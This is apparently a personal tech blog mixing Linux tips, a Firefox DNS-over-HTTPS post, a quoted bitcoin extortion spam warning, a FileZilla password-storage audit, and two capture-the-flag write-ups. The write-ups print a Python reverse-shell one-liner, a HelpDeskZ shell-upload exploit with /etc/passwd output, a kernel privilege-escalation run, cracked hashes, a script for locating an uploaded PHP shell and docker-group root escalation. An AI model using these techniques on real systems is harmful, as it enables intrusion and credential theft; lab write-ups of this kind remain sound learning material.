Smart auto complete

It seems that sometimes smart bash completion is turned off by default, so second-level arguments, such as the package name in apt install packagename, are not auto-completed. To activate it, uncomment the following lines (including the closing fi) in /etc/bash.bashrc:

#if [ -f /etc/bash_completion ]; then
#    . /etc/bash_completion
#fi

RTFM! Wallpaper

Made this for my work notebook, to remind myself to RTFM 😉


Also, 1984 has by now really become the moderate, social-democratic koala bear of reality.

Manjaro 18.0.4 on the Thinkpad X1 Tablet Gen. 1

I actually wanted to sell my X1 Tablet, since I no longer need a tablet that urgently. But before that I spontaneously booted Manjaro on it, and now I like it a lot again 🙂 Without Windows…

Manjaro 18.0.4 on the Thinkpad X1 Tablet Gen. 1, GIMP
Manjaro in GIMP on the Thinkpad X1 Tablet

From the live system everything runs promisingly well: pen, touchpad and WiFi work! After the (first) installation the first problem shows up. I installed Manjaro encrypted and unfortunately it does not recognise the encrypted partition it created itself. So I installed again, unencrypted. Now it runs…

First I checked whether I can use the 5.2.4 kernel. It works, but with so many freezes that it is unusable. So I re-enabled the 4.19 one. With some obstacles, because no GRUB menu appears and I could not, as one reads online, select the kernel at boot. The GUI was unusable because of the freezes, so I had to uninstall the kernel in the console:

pacman -R linux52

After the reboot the 4.19 kernel is running again.


Use DNS over HTTPS in Firefox

Firefox can now send your DNS requests over HTTPS, and you really should use that option. Your DNS requests are normally sent over clear-text UDP, visible to your provider and to everyone who is able to intercept your internet traffic. This means almost everyone is able to see what pages you visit. DNS over HTTPS changes that by encrypting your DNS queries.

Go to about:preferences#general

Check Enable DNS over HTTPS
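The option above only flips a checkbox, so here is what DNS over HTTPS (RFC 8484) actually changes on the wire, as an added example that is not part of the original post. The DNS query is the same message that would otherwise go out in a clear-text UDP datagram; DoH wraps it in an HTTPS request, either a GET with the message base64url-encoded in a dns= parameter or a POST with the raw message as the body, so an on-path observer sees only a TLS session to the resolver. The resolver path /dns-query is the one used in the RFC's examples and is assumed here; the reply is constructed by hand for this example, not captured from a real resolver, and all function names are mine.

```python
from __future__ import annotations
import base64
import struct

DOH_PATH = "/dns-query"   # assumed; the path RFC 8484's examples use

def encode_qname(name: str) -> bytes:
    """'www.example.com' -> length-prefixed labels terminated by a zero byte."""
    out = b""
    for label in name.strip(".").split("."):
        raw = label.encode("ascii")
        if not 0 < len(raw) < 64:
            raise ValueError(f"bad label: {label!r}")
        out += bytes([len(raw)]) + raw
    return out + b"\x00"

def decode_qname(msg: bytes, off: int) -> tuple[str, int]:
    """Inverse of encode_qname; follows RFC 1035 compression pointers."""
    labels = []
    while True:
        ln = msg[off]
        off += 1
        if ln == 0:
            return ".".join(labels), off
        if ln & 0xC0 == 0xC0:                      # pointer to an earlier name
            ptr = ((ln & 0x3F) << 8) | msg[off]
            tail, _ = decode_qname(msg, ptr)
            return ".".join(labels + [tail]), off + 1
        labels.append(msg[off:off + ln].decode("ascii"))
        off += ln

def build_query(name: str, qtype: int = 1) -> bytes:
    """Standard DNS query (header + one question): the same bytes as UDP DNS.
    ID is 0 as RFC 8484 recommends, so identical queries are HTTP-cacheable."""
    header = struct.pack("!HHHHHH", 0, 0x0100, 1, 0, 0, 0)   # flags: RD only
    return header + encode_qname(name) + struct.pack("!HH", qtype, 1)  # IN

def doh_get_target(query: bytes) -> str:
    """GET form: base64url of the message, '=' padding stripped, in ?dns=."""
    b64 = base64.urlsafe_b64encode(query).rstrip(b"=").decode("ascii")
    return f"{DOH_PATH}?dns={b64}"

def doh_post_request(host: str, query: bytes) -> bytes:
    """POST form: the raw message is the body, typed application/dns-message."""
    head = (f"POST {DOH_PATH} HTTP/1.1\r\nHost: {host}\r\n"
            "Accept: application/dns-message\r\n"
            "Content-Type: application/dns-message\r\n"
            f"Content-Length: {len(query)}\r\n\r\n")
    return head.encode("ascii") + query

def constructed_response(query: bytes, ipv4: str, ttl: int = 300) -> bytes:
    """A reply built by hand for this example (not captured from a resolver):
    echoes the question and answers with one A record via a name pointer."""
    header = struct.pack("!HHHHHH", 0, 0x8180, 1, 1, 0, 0)  # QR, RD, RA set
    rdata = bytes(int(p) for p in ipv4.split("."))
    answer = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, ttl, 4) + rdata
    return header + query[12:] + answer

def parse_a_records(msg: bytes) -> list[tuple[str, int, str]]:
    """(name, ttl, address) for every A record in the answer section."""
    _id, flags, qd, an, _ns, _ar = struct.unpack("!HHHHHH", msg[:12])
    if not flags & 0x8000:
        raise ValueError("not a response")
    off = 12
    for _ in range(qd):                       # skip the echoed question(s)
        _, off = decode_qname(msg, off)
        off += 4
    out = []
    for _ in range(an):
        name, off = decode_qname(msg, off)
        rtype, _rclass, ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        if rtype == 1 and rdlen == 4:
            out.append((name, ttl, ".".join(str(b) for b in msg[off:off + 4])))
        off += rdlen
    return out

if __name__ == "__main__":
    q = build_query("www.example.com")
    print(doh_get_target(q))          # only visible inside the TLS session
    print(parse_a_records(constructed_response(q, "192.0.2.1")))
```

For www.example.com the GET target the block prints is byte-for-byte the example in RFC 8484 section 4.1.1. One caveat the post's "which resolver to use" question already points at: the resolver operator still sees every query in the clear, so DoH moves that visibility from the ISP to whichever resolver is configured rather than removing it.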

I will do some research on which DoH-capable DNS resolver to use and report back. Btw, this ridiculous twit of an association of UK ISPs inspired me to encourage everyone to use it. It also made me comment on Twitter, the first time in ages. Calling Mozilla an internet villain for protecting people's privacy. WTF.

HackTheBox writeup of "Help"

My first writeup, for a machine called Help:

$ nmap -Pn --script vuln
Starting Nmap 7.70 ( ) at 2019-05-11 13:22 CEST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for
Host is up (0.041s latency).
Not shown: 997 closed ports
22/tcp open ssh
80/tcp open http
| http-cookie-flags:
| /support/:
|_ httponly flag not set
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|_ /support/: Potentially interesting folder
|_http-stored-xss: Couldn’t find any stored XSS vulnerabilities.
3000/tcp open ppp

File upload through a HelpDeskZ installation:

/* submit_ticket_controller.php - Line 141 */
$filename = md5($_FILES['attachment']['name'].time()).".".$ext;

Uploaded files get obfuscated similarly to HackinOS (Vulnhub): md5 of the filename and the current time.

Unfortunately .php files aren't allowed on the machine. Too bad. Tried null-byte filenames (cmd.gif^@.php etc.), no luck. Ah, OK, it seems gifs are not allowed.

At least it taught me how I could have improved my script for HackinOS. The file download looks promising.

OK, as my colleagues from link protect suggested, I tried again to upload a PHP file and not get confused by the error messages. I tried, still no luck, but then I played around with the exploit script and looked at the original HelpDeskZ source and realized that the exploit didn't add the proper upload directory and I had to point to it myself… doh, it instantly worked:

$ python hackthebox/ ja.gif0x00.php
Helpdeskz v1.0.2 - Unauthenticated shell upload exploit


GIF89a; root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false syslog:x:104:108::/home/syslog:/bin/false _apt:x:105:65534::/nonexistent:/bin/false messagebus:x:106:110::/var/run/dbus:/bin/false uuidd:x:107:111::/run/uuidd:/bin/false help:x:1000:1000:help,,,:/home/help:/bin/bash sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin mysql:x:109:117:MySQL Server,,,:/nonexistent:/bin/false Debian-exim:x:110:118::/var/spool/exim4:/bin/false

I've got RCE 🙂

I tried a few reverse shells, a Python one: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",2323));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"]);'

Got shell 🙂

TTY upgrade: python -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/dash")'

So:
help@help:/home/help$ whoami

user 🙂

Enumerating, I found:
$ cat /var/www/html/support/includes/config.php

mysql> show databases;
| Database           |
| information_schema |
| mysql              |
| performance_schema |
| support            |
| sys                |
5 rows in set (0.00 sec)

mysql> use support;

mysql> SELECT * FROM users;
| id | salutation | fullname | email       | password                                 | timezone         | status |
| 1  | 0          | helpme   |             | c3b3bd1eb5142e29adb0044b16ee4d402d06f9ca | Indian/Christmas | 1      |
| 53 | 0          | Foo Bar  | foo@bar.nul | 439d32d3c8e4170db7c2bd3dce1ba29c0cec11b4 | NULL             | 1      |
53 rows in set (0.00 sec)

The interesting row is the first one:
| 1 | 0 | helpme | | c3b3bd1eb5142e29adb0044b16ee4d402d06f9ca | Indian/Christmas | 1 |

The hash cracks (SHA-1 and MD5 of the same password) to:
c3b3bd1eb5142e29adb0044b16ee4d402d06f9ca sha1 godhelpmeplz
5d3c93182bb20f07b994a7f617e99cff md5 godhelpmeplz

We got a password for the HelpDeskZ.

With a heredoc (the target file name here is illustrative):
cat <<EOF > script.sh
script here
EOF

I could manage to get my enumeration script onto the box without having a real TTY. Something to remember! After enumerating, I started looking for privesc exploits for the configuration, and I found some exploits for the kernel version:

Linux version 4.4.0-116-generic (buildd@lgw01-amd64-021) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.9) ) #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018

After trying a few, I found this one working:

$ gcc bx.c -o bx

[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.] ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff8800369add00
[*] Leaking sock struct from ffff88000622a400
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff88003aa15680
[*] UID from cred structure: 1000, matches the current: 1000
[*] hammering cred structure at ffff88003aa15680
[*] credentials patched, launching shell…

# cat /root/root.txt
cat /root/root.txt

# whoami


Spam wave threatening Website Owners

It seems there is a massive spam campaign going on, originating from this IP: and also related to this guy: and

Spam comments get placed on WordPress websites, featuring a pretty threatening text, at least for people who have a monetary interest in their websites.

Hey. Soon your hosting account and your domain will be blocked forever, and you will receive tens of thousands of negative feedback from angry people.

Pay me 0.5 BTC until June 1, 2019.
Otherwise, you will get the reputation of a malicious spammer, your site will be blocked for life and you will be sued for insulting believers. I guarantee this to you.

My bitcoin wallet:19ckouUP2E22aJR5BPFdf7jP2oNXR3bezL

Here is a list of what you get if you don’t follow my requirements:
+ abuse spamhouse for aggressive web spam
+ tens of thousands of negative reviews about you and your website from angry people for aggressive web and email spam
+ lifetime blocking of your hosting account for aggressive web and email spam
+ lifetime blocking of your domain for aggressive web and email spam
+ Thousands of angry complaints from angry people will come to your mail and messengers for sending you a lot of spam
+ complete destruction of your reputation and loss of clients forever
+ for a full recovery from the damage you need tens of thousands of dollars

All of the above will result in blocking your domain and hosting account for life. The price of your peace of mind is 0.5 BTC.

Do you want this?

If you do not want the above problems, then before June 1, 2019, you need to send me 0.5 BTC to my Bitcoin wallet: 19ckouUP2E22aJR5BPFdf7jP2oNXR3bezL

How do I do all this to get this result:
1. I will send messages to 33 000 000 sites with contact forms with offensive messages with the address of your site, that is, in this situation, you and the spammer and insult people.
And everyone will not care that it is not you.
2. I’ll send messages to 19,000,000 email addresses and very intrusive advertisements for making money and offer a free iPhone with your website address and your contact details.
And then send out abusive messages with the address of your site.
3. I will do aggressive spam on blogs, forums and other sites (in my database there are 35 978 370 sites and 315 900 sites from which you will definitely get a huge amount of abuse) of your site
After such spam, the spamhouse will turn its attention on you and after several abuses your host will be forced to block your account for life.
Your domain registrar will also block your domain permanently.

All of the above will result in blocking your domain and hosting account for life.
If you do not want to receive thousands of complaints from users and your hosting provider, then pay before June 1, 2019.
The price of your peace of mind is 0.5 BTC.
Otherwise, I will send your site through tens of millions of sites that will lead to the blocking of your site for life and you will lose everything and your reputation as well.
But get a reputation as a malicious spammer.

My bitcoin wallet:19ckouUP2E22aJR5BPFdf7jP2oNXR3bezL

A quick search shows that a lot of websites got those comments.

Seehofer -.-

Attack on WhatsApp & Co.: Seehofer wants to force messengers to decrypt

heise online –

Everyone, please vote the CSU out, urgently.

But that's nothing new; since 2001 human rights have been on a downward slope. When do we finally get a social scoring system like in China? Do the dystopias have to come true at such a rapid pace?

On Sunday, please vote for love and freedom <3

FileZilla stores passwords in (almost) plain text

When importing my sitemanager.xml from my Windows FileZilla to my Linux box, I discovered that the passwords in it are stored base64-encoded, completely unencrypted. This sucks, because I use a master password to, as I thought, encrypt my passwords.

        <Pass encoding="base64">base64 encoded password</Pass>

So what is the master password for? Establishing a false sense of security? Doh. It shows us that FileZilla has been doing it that way for years already.

inurl:"sitemanager.xml" ext:xml -git

DON’T store your passwords in filezilla.
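To check whether a sitemanager.xml holds credentials that are only base64-encoded, as the post describes, here is an added audit script; it is my code, not FileZilla's. The XML is a constructed sample in the same layout as the <Pass encoding="base64"> line quoted above. The second entry carries a made-up, non-base64 encoding attribute purely so the audit has something it must not decode; it makes no claim about how FileZilla stores encrypted passwords.

```python
from __future__ import annotations
import base64
import xml.etree.ElementTree as ET

# Constructed sitemanager.xml in FileZilla's layout (not the author's file).
# The second <Pass> uses a placeholder encoding attribute, not FileZilla's
# real encrypted format, so the audit can show what it does NOT flag.
SAMPLE_SITEMANAGER = """\
<FileZilla3 version="3.41.2" platform="windows">
  <Servers>
    <Server>
      <Host>ftp.example.test</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <User>alice</User>
      <Pass encoding="base64">aHVudGVyMg==</Pass>
      <Name>example ftp</Name>
    </Server>
    <Server>
      <Host>sftp.example.test</Host>
      <Port>22</Port>
      <Protocol>1</Protocol>
      <User>bob</User>
      <Pass encoding="placeholder-encrypted">ZmFrZQ==</Pass>
      <Name>example sftp</Name>
    </Server>
    <Server>
      <Host>anon.example.test</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <User>anonymous</User>
      <Name>no password stored</Name>
    </Server>
  </Servers>
</FileZilla3>
"""

def audit_sitemanager(xml_text: str) -> list[dict]:
    """One record per <Server>: whether its password is stored base64 (an
    encoding, not encryption) and, if so, what it decodes to."""
    root = ET.fromstring(xml_text)
    report = []
    for server in root.iter("Server"):
        pw = server.find("Pass")
        rec = {
            "name": server.findtext("Name", ""),
            "host": server.findtext("Host", ""),
            "user": server.findtext("User", ""),
            "encoding": pw.get("encoding") if pw is not None else None,
            "reversible": False,
            "plaintext": None,
        }
        if pw is not None and pw.get("encoding") == "base64" and pw.text:
            # base64 is reversible by anyone who can read the file
            rec["reversible"] = True
            rec["plaintext"] = base64.b64decode(pw.text).decode("utf-8", "replace")
        report.append(rec)
    return report

def exposed_hosts(xml_text: str) -> list[str]:
    """user@host pairs that anyone who can read the file can log in as."""
    return [f"{r['user']}@{r['host']}"
            for r in audit_sitemanager(xml_text) if r["reversible"]]

if __name__ == "__main__":
    for r in audit_sitemanager(SAMPLE_SITEMANAGER):
        print(r)
    print("exposed:", exposed_hosts(SAMPLE_SITEMANAGER))
```

Run it against a real sitemanager.xml (FileZilla keeps it under the user's FileZilla profile directory) and rotate every credential it lists as reversible; the dork quoted above is exactly what makes a copied or accidentally published file dangerous.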

Vulnhub HackinOS writeup

Running Sparta gave me ports 22 and 8000; on 8000 I found a defunct WordPress which pointed to localhost. That could be fixed by locally assigning localhost to the VM's network IP.

I also found that Handsome_Container was a valid WordPress username. I started bruteforcing it with Burp Suite.

Nikto revealed some interesting info:

- Nikto v2.1.6
+ Target IP:
+ Target Hostname:
+ Target Port: 8000
+ Start Time: 2019-05-01 14:55:20 (GMT2)
+ Server: Apache/2.4.25 (Debian)
+ Retrieved x-powered-by header: PHP/7.2.15
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Root page / redirects to:
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/upload.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Apache/2.4.25 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Uncommon header 'link' found, with contents: ; rel=""
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wp-content/plugins/hello.php: PHP error reveals file system path.
+ OSVDB-62684: /wp-content/plugins/hello.php: The WordPress hello.php plugin reveals a file system path
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login.php: WordPress login found
+ 7919 requests: 0 error(s) and 16 item(s) reported on remote host
+ End Time: 2019-05-01 14:56:56 (GMT2) (96 seconds)
+ 1 host(s) tested

The /upload.php is interesting: it's an image upload function. I started uploading PNG images infected with PHP reverse shells. That didn't work out.

Warning: getimagesize(): PNG file corrupted by ASCII conversion in /var/www/html/upload.php on line 25

At some point I found the hint hidden in the HTML code: <!-- Hint -->
That revealed the upload.php's code:

That makes it a lot easier. We can see that the file is renamed to the md5 of the filename and a random number from 1-100.
The script checks the MIME type of the uploaded file but not the extension; allowed are the gif and png MIME types.
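Both writeups on this page, the HelpDeskZ line quoted in the Help writeup and the upload.php described above, hit the same two upload defects: the content check looks only at the MIME type sniffed from the file's first bytes, so a file that starts with a GIF header passes, and the stored name is derived from predictable inputs (the original name plus time() or a number from 1 to 100). The following added example, which is my code and not the code of either application, puts that weak check next to a hardened one. The sample files are constructed, and all function names are mine.

```python
from __future__ import annotations
import hashlib
import secrets

# Constructed sample uploads for this example (not files from either machine).
CLEAN_GIF = b"GIF89a" + bytes(16)
# A "polyglot": valid GIF signature with PHP source behind it. A MIME sniff
# accepts it, and a PHP handler would execute it if it is stored as .php.
PHP_WITH_GIF_HEADER = b"GIF89a;<?php echo 'hello from an image'; ?>"

# extension allowlist -> the MIME type its magic bytes must sniff as
ALLOWED = {"gif": "image/gif", "png": "image/png"}
MAGIC = {b"GIF87a": "image/gif", b"GIF89a": "image/gif",
         b"\x89PNG\r\n\x1a\n": "image/png"}

def sniff_mime(data: bytes) -> str | None:
    """Signature-based sniff, roughly what PHP's getimagesize() keys on."""
    for magic, mime in MAGIC.items():
        if data.startswith(magic):
            return mime
    return None

def weak_upload(filename: str, data: bytes, nonce: int) -> str | None:
    """The pattern from the writeups: sniff the content, keep whatever
    extension the client sent, name the file md5(name + small nonce).
    Returns the stored name, or None if rejected."""
    if sniff_mime(data) is None:
        return None
    ext = filename.rsplit(".", 1)[-1]           # attacker-controlled
    digest = hashlib.md5((filename + str(nonce)).encode()).hexdigest()
    return f"{digest}.{ext}"                     # predictable, .php survives

def hardened_upload(filename: str, data: bytes) -> str | None:
    """Allowlist the extension, require the signature to agree with it,
    and pick a stored name the client cannot predict."""
    if "\x00" in filename:                       # cmd.gif\0.php style names
        return None
    _base, dot, ext = filename.rpartition(".")
    ext = ext.lower()
    if not dot or ext not in ALLOWED:            # .php never gets through
        return None
    if sniff_mime(data) != ALLOWED[ext]:         # extension must match content
        return None
    if b"<?" in data:                            # cheap defence in depth vs polyglots
        return None
    return f"{secrets.token_hex(16)}.{ext}"      # 128-bit random name

if __name__ == "__main__":
    print("weak     :", weak_upload("cmd.php", PHP_WITH_GIF_HEADER, 7))
    print("hardened :", hardened_upload("cmd.php", PHP_WITH_GIF_HEADER))
    print("hardened :", hardened_upload("cat.gif", CLEAN_GIF))
```

Two things the code does not do still matter: the upload directory must be served without a script handler (a random name only buys time if .php is executable there), and the random name means the application has to return or store the name itself rather than letting a client reconstruct it, which is exactly the property the 100-hash script below exploits.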

So I created a random PNG image with GIMP, opened it with a hex editor and put a PHP reverse shell in it. The upload won't work -.- After learning and experimenting I found a GIF working like that:

cat cmd.php

Now we get to launch the shell, and for that we need to find the uploaded file, so I wrote a script to create the 100 possible hashes of cmd.phpXXX:


import hashlib

# name of the uploaded file, e.g. cmd.php, read from stdin
textToEncode = input()

# upload.php stores the file under md5(filename . rand(1,100)),
# so there are only 100 candidate names; print one per line for wfuzz
bisHundert = 1
while bisHundert <= 100:
    toEncode = textToEncode + str(bisHundert)
    print(hashlib.md5(toEncode.encode()).hexdigest())
    bisHundert += 1

$ python3 > cmdphphashes.txt
thomsane@anansi:~/python$ cat cmdphphashes.txt

Now we can supply wfuzz with the payloads stored in the text file.

$ sudo wfuzz -w python/cmdphphashes.txt --hc 404

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz’s documentation for more information.

* Wfuzz 2.3.4 - The Web Fuzzer *

Total requests: 100

ID Response Lines Word Chars Payload

000024: C=200 3 L 16 W 165 Ch "39b07a3be178f1249b64f60105360c4b"

Total time: 0.245449
Processed Requests: 100
Filtered Requests: 99
Requests/sec.: 407.4165

And it found our "picture" at

And my listener received the shell 🙂, which I upgraded to a real TTY with python -c 'import pty; pty.spawn("/bin/bash")' and started looking for privesc possibilities.

I found /usr/bin/tail to have the SUID bit set and tried:
$ tail -n 100 /root/flag
Life consists of details..

Well, that's not a flag, right? But no permission error either, whereas cat gives: cat: /root/flag: Permission denied

tail -c1G /etc/shadow

Enumerating further, I found: $ cat /etc/init.d/
cat /etc/init.d/

while [ 1 ]
do
    rm -rf /var/www/html/uploads/*.php
    sleep 300
done

Okay… that was what was keeping Burp Suite Intruder from finding the file, because of the speed throttling in the free edition. -.-

cat wp-config.php

LOCK TABLES `host_ssh_cred` WRITE;
/*!40000 ALTER TABLE `host_ssh_cred` DISABLE KEYS */;
INSERT INTO `host_ssh_cred` VALUES ('hummingbirdscyber','e10adc3949ba59abbe56e057f20f883e');
/*!40000 ALTER TABLE `host_ssh_cred` ENABLE KEYS */;

INSERT INTO `wp_users` VALUES (1,'Handsome_Container','$P$BXJ8ZmtYd5lHZOLPgTccLUhaQLxm0L0','handsome_container','','','2019-02-23 15:49:54','',0,'Handsome_Container');

e10adc3949ba59abbe56e057f20f883e is the md5 of 123456

Well, well, well… I was on a container before! I noticed it when I looked in /var/www/html and only found an index.html. I had been suspecting that when I looked at the mounts on the container…

[+] Current User

[+] Current User ID
uid=1000(hummingbirdscyber) gid=1000(hummingbirdscyber) groups=1000(hummingbirdscyber),4(adm),24(cdrom),30(dip),46(plugdev),113(lpadmin),128(sambashare),129(docker)

OK, we are in the docker group… so basically root already.
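Membership in the docker group is what makes the last step trivial. As an added example (not from the post), here is a small triage helper that parses the id output quoted above and a constructed /etc/group excerpt and flags groups that are root-equivalent on a stock Linux install. The group list, severities and reasons are my own shorthand and should be adjusted per distribution.

```python
from __future__ import annotations
import re

# Groups that matter when triaging `id` output. Severities and reasons are my
# own shorthand for a stock Debian/Ubuntu-style box; adjust per distribution.
RISKY_GROUPS = {
    "docker": ("root-equivalent", "can start a container with / bind-mounted"),
    "lxd":    ("root-equivalent", "can launch a privileged container"),
    "disk":   ("root-equivalent", "raw read/write on block devices, rootfs included"),
    "sudo":   ("root-equivalent", "in sudoers by default on Debian/Ubuntu"),
    "wheel":  ("root-equivalent", "in sudoers by default on Fedora/RHEL/Arch"),
    "shadow": ("sensitive", "can read the password hashes in /etc/shadow"),
    "adm":    ("sensitive", "can read system logs under /var/log"),
}

# The id line from this writeup.
ID_LINE = ("uid=1000(hummingbirdscyber) gid=1000(hummingbirdscyber) "
           "groups=1000(hummingbirdscyber),4(adm),24(cdrom),30(dip),46(plugdev),"
           "113(lpadmin),128(sambashare),129(docker)")

# Constructed /etc/group excerpt (not copied from the VM).
SAMPLE_ETC_GROUP = """\
root:x:0:
adm:x:4:syslog,hummingbirdscyber
sudo:x:27:
docker:x:129:hummingbirdscyber
hummingbirdscyber:x:1000:
"""

def groups_from_id(id_output: str) -> list[str]:
    """Group names from `id` output such as '... groups=4(adm),129(docker)'."""
    m = re.search(r"groups=(\S+)", id_output)
    if not m:
        raise ValueError("no groups= field in id output")
    return re.findall(r"\d+\(([^)]+)\)", m.group(1))

def triage_groups(groups: list[str]) -> list[tuple[str, str, str]]:
    """(group, severity, reason) for each risky group, in the order id lists them."""
    return [(g, *RISKY_GROUPS[g]) for g in groups if g in RISKY_GROUPS]

def is_root_equivalent(groups: list[str]) -> bool:
    """True if any listed group makes the account effectively root."""
    return any(sev == "root-equivalent" for _, sev, _ in triage_groups(groups))

def users_in_risky_groups(etc_group: str) -> dict[str, list[str]]:
    """Defender-side view: which accounts /etc/group puts into risky groups."""
    found: dict[str, list[str]] = {}
    for line in etc_group.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _pw, _gid, members = line.split(":", 3)   # exactly four fields
        if name in RISKY_GROUPS and members:
            found[name] = members.split(",")
    return found

if __name__ == "__main__":
    for g, sev, why in triage_groups(groups_from_id(ID_LINE)):
        print(f"{sev:16} {g:8} {why}")
    print(users_in_risky_groups(SAMPLE_ETC_GROUP))
```

The mitigation is administrative rather than technical: treat docker group membership exactly like sudo access, grant it only to accounts you would give root to, and prefer rootless Docker where container use by unprivileged users is needed.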

Let's look at what containers are running:

hummingbirdscyber@vulnvm:~$ docker ps
252fa8cb1646 ubuntu "/bin/bash" 2 months ago Up 2 days brave_edison
1afdd1f6b82c wordpress:latest "docker-entrypoint.s…" 2 months ago Up 2 days>80/tcp experimental_wordpress_1
81a93420fd22 mysql:5.7 "docker-entrypoint.s…" 2 months ago Up 2 days 3306/tcp, 33060/tcp experimental_db_1

Since I run the vulnerable VM without internet access for security reasons, I used the ubuntu image that already exists to elevate my privileges:

hummingbirdscyber@vulnvm:~$ docker run -v /:/hostOS -i -t ubuntu

Now we run a new container and the / filesystem of the main host is mounted at /hostOS:

root@c50ed36b8d25:/hostOS/root# cat flag


                                 `+mMMMMMMd/           ./oso/-                           
                                  `/yNMMMMMMMMNo`   .`   +-                   
                                  .oyhMMMMMMMMMMN/.     o.                  
                                    `:+osysyhddhs`    `o`                  
                                     .:oyyhshMMMh.   .:                      
                                  `-//:. `:sshdh: `                         
                                      /+. .d`                           
                                    -/`  `y`                                  
                                  `:`   `/                                    
                                 `.     `

that was fun 🙂 <3